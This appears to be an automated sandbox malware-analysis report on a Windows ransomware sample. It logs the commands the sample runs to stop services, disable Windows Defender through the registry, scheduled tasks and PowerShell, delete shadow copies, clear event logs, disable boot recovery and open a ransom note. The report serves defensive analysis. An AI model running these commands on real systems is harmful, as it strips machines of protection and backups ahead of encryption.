20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 1420 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 2044 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 2044 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 2044 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe PID 1520 wrote to memory of 988 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe"C:\Users\Admin\AppData\Local\Temp\20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1604
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1172
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1996
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1672
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1700
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1912
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1684
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1184
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1908
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1744
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2004
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1420
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:2044
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:988
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1312
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1564
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:568
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:552
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:620
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1080
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1672
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1344
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:612
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1456
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1200
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:860
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1732
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2028
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1920
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1572
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:948
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1592
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1604
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1832
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1176
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1368
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1536
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2040
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1944
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1308
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1548
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1584
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1392
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:592
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1524
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1684
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1608
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1760
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1052
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1688
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1904
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:816
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1140
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2056
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\etrU_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2428
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD501da03e948065c90b54c45ddbf7193c8
SHA179247f65856bd7ad183132646f8ee340f83b0075
SHA256b1d433947c7374d7bdcdd7cbbcb81cb57575e3dc3de0e1e1285b6b060ce22264
SHA5124162a210366e210e9a93932a66f3d1196f0b1d3f71666e251f49d0fad52b91063cb877ba86707c0f8dda08a678e29879e1d83308e70f1669f1dc1cbdd530cf1d
-
MD5
0819f2d4d4023be7a970d21dc32f7f19
SHA153dc2551d2e0c22517bbc35b9150ce46fbb1cea6
SHA256740146275a2bff1af1df4bc6bd92c056642e34a602b97296de198b159b6d69f5
SHA512693234d6d44f15c55665ce167a8d272a3f1269de56bc9ce4c819f68ce3a75bf606bd1ef6bebd798399307715c4711baf195832ceafd7c365548eef2520831a90